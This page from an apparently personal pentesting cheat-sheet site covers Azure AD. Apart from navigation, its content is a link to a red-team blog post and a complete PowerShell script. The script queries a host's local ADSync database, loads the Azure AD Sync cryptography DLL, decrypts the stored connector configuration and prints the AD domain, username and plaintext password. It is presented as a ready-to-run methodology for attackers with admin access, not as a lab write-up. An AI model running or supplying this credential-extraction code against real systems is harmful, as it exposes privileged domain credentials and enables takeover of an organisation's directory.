Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  1. Cloud

Azure AD

  • f you are on Azure Admins group?

## ------------------| Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## ------------------| Methodology 
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
PreviousDockerNextKubernetes

Last updated 2 years ago

☁️